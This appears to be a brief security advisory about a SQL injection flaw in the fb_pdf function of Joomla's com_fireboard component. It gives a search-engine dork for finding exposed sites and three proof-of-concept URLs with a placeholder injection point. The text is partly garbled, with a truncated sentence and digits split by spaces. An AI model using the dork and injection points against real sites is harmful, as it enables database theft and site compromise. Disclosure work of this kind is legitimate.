Effects version 7. 3
Joomla is a free and open source content management system (CMS) for publishing content on the World
Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be
Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design
patterns, stores data in a MySQL database, and includes features such as page caching,
RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language
(Details see the official homepage: http://en.wikipedia.org/wiki/Joomla)
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab. ir) discovered a SQL Injection Vulnerability in
the com_fireboard module of the joomla CMS.
A SQL Injection vulnerability is detected in the com_fireboard module of the joomla Content Management System.
Remote attackers &low privileged user accounts can execute/inject own sql commands to compromise the application dbms.
The vulnerability is located in the com_fireboard module with the bound vulnerable func fb_ parameter.
Successful exploitation of the vulnerability result in dbms (Server) or application (Web) compromise.
[+] index. php? option=com_fireboard
[+] func fb_
Test to prove:
The sql injection vulnerability can be exploited by remote attackers without user inter action & with low
privileged user account. For demonstration or reproduce ...
inurl:"id=" & intext:"/com_fireboard/"
xxx.com/fireboard/index.php?option=com_fireboard&Itemid=3 8&id=2 2 1 1 1&catid=1 6&func=fb_pdf'[SQL-INJECTION]
xxx.com/board/index.php?option=com_fireboard&Itemid=5 4&id=7 0 1 2 2&catid=1 2&func=fb_pdf'[SQL-INJECTION]
xxx.com/jmfireboard/index.php?option=com_fireboard&Itemid=5 4&id=7 0 1 2 2&catid=1 2&func=fb_pdf'[SQL-INJECTION]
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM